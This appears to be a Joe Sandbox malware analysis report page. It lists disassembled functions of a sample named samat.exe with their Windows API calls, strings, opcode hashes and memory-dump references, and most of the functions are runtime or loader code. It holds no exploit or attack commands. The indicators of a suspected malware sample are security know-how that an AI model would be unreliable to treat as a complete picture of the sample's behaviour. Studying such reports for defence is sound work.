Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: f0cc6981874ae1e4e83bbbda7f8231ba2ce14cdd7852a331e847ba866ec1225f
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 97217F72B1878182E721AB51B8827EAA298BB88384F804137FE8D93659DFBCD155C751

Function 00007FF7E12D9A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7E12D9AAD
GetProcAddress.KERNEL32 ref: 00007FF7E12D9AC3
FreeLibrary.KERNEL32 ref: 00007FF7E12D9AEA

Strings

CorExitProcess, xrefs: 00007FF7E12D9ABC
mscoree.dll, xrefs: 00007FF7E12D9AA4

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: c812952b3c9c5f1efef9bf35d97d970c124134a5925a48ec373d531ee2ef18c3
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: A9F0682270970681EF15AB24EC563759328FF49761F944237D57E451E4DFBDD044C322

Function 00007FF7E12E9368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7E12E9390
_set_statfp.LIBCMT ref: 00007FF7E12E93AB
_set_statfp.LIBCMT ref: 00007FF7E12E93C7
_set_statfp.LIBCMT ref: 00007FF7E12E9403

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: 7da888a16346858616c46f2e1825281b0af9907d375dea920da0568e8fa27529
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: C2118922F5CA0301FF563256ECA33799258AF55360E84D637FA6FD63D68EFC58414122

Function 00007FF7E12DB390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3AF
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3CE
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB3F6
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB407
FlsSetValue.KERNEL32(?,?,?,00007FF7E12DA5A3,?,?,00000000,00007FF7E12DA83E,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DB418

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
Instruction ID: d42ab028b4c6c82e7e75043ef3cc9cafb51a2374711b1084feed7626b62e337f
Opcode Fuzzy Hash: 076d9937837767d8c0599fb7139188ad361754fd070b51876ae2b58645e7f25c
Instruction Fuzzy Hash: 6D116022F0864241FB54B726ED633B99149AF457B0FC84336D82E467CADDBDE4528226

Function 00007FF7E12DB224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7E12DB235
FlsSetValue.KERNEL32 ref: 00007FF7E12DB254
FlsSetValue.KERNEL32 ref: 00007FF7E12DB27C
FlsSetValue.KERNEL32 ref: 00007FF7E12DB28D
FlsSetValue.KERNEL32 ref: 00007FF7E12DB29E

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
Instruction ID: f3fc36c4f2c9f8cf0da75019a1960821875c7ac530a93af9de9d1ee1cf7523cb
Opcode Fuzzy Hash: 84df6eade7ca2759e64539926e88efdc2e23a1e9973d593929f07b0eae7a4c09
Instruction Fuzzy Hash: A1113622F0820342FB687262CC277BE914A5F46335F84473AD93E0A2C6DDBDB8114237

Function 00007FF7E12D5FA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D5FDC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D6106
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D61BC

Strings

verbose, xrefs: 00007FF7E12D5FB0

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction ID: 0449f084a999739a1ea63e0c6ec76723555590a9e7e7d8026b7d5408e26b1d21
Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
Instruction Fuzzy Hash: 0B91D233B0864681F760AE24DC5277DB7A9AB44B94FC44133DA6D473D5DEBDE4058322

Function 00007FF7E12DFBC8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DFEA7

Part of subcall function 00007FF7E12D7A3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D7A59

Strings

ccs, xrefs: 00007FF7E12DFDE2
UTF-8, xrefs: 00007FF7E12DFE26
UTF-16LEUNICODE, xrefs: 00007FF7E12DFE45

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction ID: 1bde7abaf74e265acf9910cc2706a8260ceb2c6d66cd1714166ae8b7dbc88686
Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
Instruction Fuzzy Hash: 0B819673F0824285E764BF25C9023B8B6A89B15B4CFD54037CA1997295CBBDE503932F

Function 00007FF7E12CD648 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E12CD673
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7E12CD70A
RtlUnwindEx.KERNEL32 ref: 00007FF7E12CD764

Strings

csm, xrefs: 00007FF7E12CD6F1

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction ID: a41aad11e155a191a89aba095d5a602d812d26114f03c9bc50745866e9447eee
Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
Instruction Fuzzy Hash: 9051D032B196468BDB18EB15E805B39B399EB44B88F908132DB4E57744DFBCE841C791

Function 00007FF7E12CF288 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7E12CF2B0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7E12CF398

Strings

csm, xrefs: 00007FF7E12CF2D2
csm, xrefs: 00007FF7E12CF3EA

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction ID: 7dca480201d23c5cc3b86cc1976281541331fd4fa52ef37d07f15c7c6497111e
Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
Instruction Fuzzy Hash: 7E519072B0868286EB74AB21D8463A8F7A8FB55B84F944137DB4C43B85CFBCE450C716

Function 00007FF7E12CEED8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7E12CEF37
_CallSETranslator.LIBVCRUNTIME ref: 00007FF7E12CEF83

Strings

RCC, xrefs: 00007FF7E12CEF53
MOC, xrefs: 00007FF7E12CEF4B

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction ID: 4f4acf3db6a1496d3ccb50d3957312152144630ee5cc2409c2be93bbd7d7be7a
Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
Instruction Fuzzy Hash: 4461A532A08BC586D730AB15E8413EAF7A4FB85B84F444226EB9C13B59DFBCD190CB11

Function 00007FF7E12C2810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7E12C28EA

Strings

ERROR, xrefs: 00007FF7E12C286F
[PYI-%d:%ls] , xrefs: 00007FF7E12C2868
Error, xrefs: 00007FF7E12C28DD

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: c20c5bac15e93646483ef002f2ef816c3de1d88c6d6b17bdf81f9a4ea31eda03
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 0921AE62B08B4182E711AB24F8467EAA3A8FB88780F804137EE8D93759DF7CD255C751

Function 00007FF7E12DC5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF7E12DC61F
WriteFile.KERNEL32 ref: 00007FF7E12DC8E7
WriteFile.KERNEL32 ref: 00007FF7E12DC92D
GetLastError.KERNEL32 ref: 00007FF7E12DC9E3

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: ca859f0debb260d3f94ba8c9b9133667254b6a4473089241e7fd301a5f4fd0f6
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: C9D12273B08A818AE711DF65C8412FCB7B9FB54798B80423ACE4E97B89DE78D016C311

Function 00007FF7E12C20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF7E12C20F4
SetWindowLongPtrW.USER32 ref: 00007FF7E12C2116
GetWindowLongPtrW.USER32 ref: 00007FF7E12C2140
InvalidateRect.USER32 ref: 00007FF7E12C2160

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: bdb3119776480670bd33c00a24fb90074b6b5d7000cde9b4a31b5e9c0cd29130
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: A111E925B0C14282FB55A76AED463799296FFC4780FC48033DB4907B8ACDFDD581C212

Function 00007FF7E12E5B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12E1760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E1793

_get_daylight.LIBCMT ref: 00007FF7E12E5C34
_get_daylight.LIBCMT ref: 00007FF7E12E5C45

Strings

?, xrefs: 00007FF7E12E5BC5

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: 64fa262109a55f46b90cb0bb29926850b713b0a42e297736b0476290db06b84c
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: 09419E56B2834142FB62A731DC13379E758EB80BA4F948236EE4D87AD9DFBCD0418B01

Function 00007FF7E12D9014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D9046

Part of subcall function 00007FF7E12DA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7E12CCBA5), ref: 00007FF7E12D9064

Strings

C:\Users\user\AppData\Local\Temp\1008029001\samat.exe, xrefs: 00007FF7E12D9052

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
API String ID: 3580290477-3004328233
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: 5544536e54f649732cfc9ad443cc61b9a80f777ffa9e05f62b53230a93af300f
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: 24419136B0861286EB15BF21D8422BCA398EB44794B95403BE94E43B85CFBDE4818322

Function 00007FF7E12DCC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7E12DCD4F
GetLastError.KERNEL32 ref: 00007FF7E12DCD71

Strings

U, xrefs: 00007FF7E12DCCFB

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 333f0d91c31fc5cb4db87eeaddf17072881df474e74a63838ce10eea95677d45
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: 3E41E533718A4181DB20AF25E8453AAA7A4FB88784FC44136EE4E87798DF7CD411C751

Function 00007FF7E12DF5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7E12DF5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7E12DF64A

Strings

:, xrefs: 00007FF7E12DF60E

Memory Dump Source

Source File: 00000007.00000002.4592535190.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000007.00000002.4592472245.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592605136.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592668306.00007FF7E1302000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.4592786986.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
Instruction ID: 3d4155d7d2cd958bd72502162b4ac7fdd9e655a56eb56c5e6449df122de90c34
Opcode Fuzzy Hash: d7e4ed55f29cf6b5985c16ba7c582ed18ee62b51760ed1b5a20f115a32bf7e2e
Instruction Fuzzy Hash: 26210B63B0828145EB20AB21D84536DB3A9FB84B48FC54037D65D43A94DFBCE5458BA6

Function 00007FF7E12CFD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7E12CFD98
RaiseException.KERNEL32 ref: 00007FF7E12CFDD9

Strings

